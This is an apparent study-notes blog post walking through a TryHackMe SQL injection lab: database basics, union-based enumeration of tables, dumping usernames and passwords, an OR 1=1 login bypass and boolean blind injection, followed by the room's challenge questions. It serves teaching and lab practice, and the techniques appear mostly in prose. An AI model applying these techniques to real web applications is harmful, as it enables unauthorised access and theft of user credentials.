Introduction

We covered the types of SQL injection vulnerability namely error based, time based, blined and boolean based SQL injection. We used TryHackMe Junior Penetration Tester pathway.

SQL (Structured Query Language) Injection, mostly referred to as SQLi, is an attack on a web application database server that causes malicious queries to be executed. When a web application communicates with a database using input from a user that hasn’t been properly validated, there runs the potential of an attacker being able to steal, delete or alter private and customer data and also attack the web applications authentication methods to private or customer areas. This is why as well as SQLi being one of the oldest web application vulnerabilities, it also can be the most damaging.

Get OSCP Certificate Notes

 Web Hacking & Pentesting Study Notes

What is a database?

A database is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS which is an acronym for  Database Management System, DBMS’s fall into two camps Relational or Non-Relational, the focus of this room will be on Relational databases,  some common one’s you’ll come across are MySQL, Microsoft SQL Server, Access, PostgreSQL and SQLite. We’ll explain the difference between Relational and Non-Relational databases at the end of this task but first, it’s important to learn a few terms.

Within a DBMS, you can have multiple databases, each containing its own set of related data. For example, you may have a database called “shop“. Within this database, you want to store information about products available to purchaseusers who have signed up to your online shop, and information about the orders you’ve received. You’d store this information separately in the database using something called tables, the tables are identified with a unique name for each one. You can see this structure in the diagram below, but you can also see how a business might have other separate databases to store staff information or the accounts team.

Intro to SQL Injection

The instructor explains that the lesson focuses on SQL injection, specifically the in-band form of SQLi, where the application returns an error message that can be exploited to extract data from the database. In this case, the database management system (DBMS) is MySQL.

Basic SQL Injection Concepts

The instructor demonstrates how to manipulate a URL parameter to produce an error and how to use this error to infer the structure of the underlying SQL query. They show how the URL is tied to an SQL statement like SELECT * FROM article WHERE id = 1, which can be manipulated to conduct a Union-based SQL injection.

Enumerating Columns and Tables:

  • After generating an error, the instructor demonstrates how to find the number of columns in the database by modifying the SQL query using the UNION SELECT statement.
  • They then show how to dump all the table names from the information_schema.tables table to list the available tables in the database.
  • Once they identify the staff_users table, they enumerate its columns and focus on dumping the username and password columns.

Dumping Data: Using group_concat, they successfully retrieve the usernames and passwords from the staff_users table. The usernames and passwords are separated using SQL commands, and the flag for one of the questions in the TryHackMe room is found.

Bypassing Login Forms with SQL Injection:

  • The instructor moves on to another level, demonstrating how to use SQL injection to bypass a login form.
  • They explain the SQL query behind the scenes (SELECT * FROM users WHERE username = 'admin' AND password = 'password') and show how to manipulate the logic using the OR 1=1 technique, which always evaluates as true. This allows them to bypass the password check.

Boolean-based Blind SQL Injection:

  • In the next segment, the instructor introduces Boolean-based blind SQL injection, where the application does not return visible error messages, but the responses (true/false) help determine if the SQL query is valid.
  • By observing the differences between true and false responses, they explain how to extract information from the database even without explicit error messages.

Challenge Questions and Answers

What is the acronym for the software that controls a database?
 

What is the name of the grid-like structure which holds the data?

What SQL statement is used to retrieve data?
 

What SQL clause can be used to retrieve data from multiple tables?

 

What SQL statement is used to add data?

What character signifies the end of an SQL query?
What is the flag after completing level 1?
What is the flag after completing level two? (and moving to level 3)
What is the flag after completing level three?
What is the final flag after completing level four?
Name a protocol beginning with D that can be used to exfiltrate data from a database.
 

Video Walk-through

 

, ,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles